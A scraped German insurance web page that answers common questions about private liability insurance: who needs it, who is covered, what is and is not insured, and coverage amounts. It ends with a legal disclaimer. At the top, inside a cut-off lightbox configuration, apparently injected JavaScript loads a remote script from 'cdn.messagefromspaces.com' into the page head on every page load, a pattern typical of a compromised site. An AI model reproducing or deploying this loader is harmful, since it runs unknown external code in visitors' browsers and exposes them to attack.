, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Haftpflicht–Versicherung


“Jeder braucht eine Haftpflichtversicherung – aber nicht jeder dieselbe.”
(Finanztest)

Die Private Haftpflichtversicherung schützt Sie und Ihre Familie vor den finanziellen Folgen, welche aus Risiken des täglichen Lebens entstehen. Ihre Private Haftpflichtversicherung befriedigt berechtigte Ansprüche Dritter gegen Sie und wehrt unberechtigte Forderungen gegen Sie ab (umgekehrte Rechtsschutzfunktion!).
 
 

Fragen und Antworten

Wer braucht eine Private Haftpflichtversicherung?
Es lohnt sich grundsätzlich für jeden Erwachsenen und jede Familie, eine Privathaftpflicht abzuschließen. Insbesondere bei Personenschäden können Forderungen bei einer nicht vorhandenen Privathaftpflicht schnell den finanziellen Ruin bedeuten.

Wer ist versichert?
Der Schutz der Privaten Haftpflichtversicherung ist grundsätzlich auf den Familienkreis ausgerichtet. Der Versicherungsnehmer und Personen des gleichen Privat–Haushaltes sind im gleichen Umfang mitversichert. Darüber hinaus bestehen gesonderte Angebote zum Beispiel für Singles, die ausschließlich den Versicherungsnehmer schützen.

Was ist versichert?
Versichert ist die gesetzliche Haftpflicht des Versicherungsnehmers als Privatperson aus den Risiken des täglichen Lebens. Hiermit sind im Wesentlichen die Ansprüche gemeint, die gegen den Versicherungsnehmer zum Beispiel als Gast, Gastgeber, Sportler, Fußgänger und in der Freizeit geltend gemacht werden.

Grundsätzlich sind Personen– und Sachschäden versichert. Mietsachschäden und Vermögensschäden können ebenfalls versichert werden.

Wie hoch muss die Deckungssumme sein?
Wenn Sie einen Schaden verursachen, haften Sie grundsätzlich uneingeschränkt mit Ihrem gesamten Vermögen. Aus diesem Grund ist es eine Überlegung Wert, eine möglichst hohe Versicherungssumme für Ihre Privathaftpflicht (Deckungssumme) abschließen. Gerne vergleichen wir für Sie die Leistungen verschiedener Anbieter. Prüfen Sie Ihren bestehenden Vertrag und finden Sie mit uns eine Privathaftpflicht mit gleichwertigen Leistungen zu einem günstigeren Beitrag.

Was ist nicht versichert?
Nicht alle Risiken des täglichen Lebens können versichert werden. Aus diesem Grund sind Gefahren, welche eher dem Bereich der Betriebs– oder Berufshaftpflicht zuzuordnen sind oder außerhalb eines “durchschnittlichen” Privatlebens liegen von der Versicherung ausgeschlossen.

Dieses Homepage richtet sich nicht an Personen mit Wohn– und/ oder Gesellschaftssitz und/ oder Niederlassungen im Ausland, vor allem in den Vereinigten Staaten von Amerika, Kanada, Großbritannien oder Japan. Die angebotenen Information stellen kein öffentliches Angebot für den Abschluss von Versicherungen dar. Der Anbieter gibt keine Gewährleistungen oder Zusicherungen hinsichtlich der Vollständigkeit oder Richtigkeit dieser Informationen oder Meinungen ab.


Email
Print
WP Socializer Aakash Web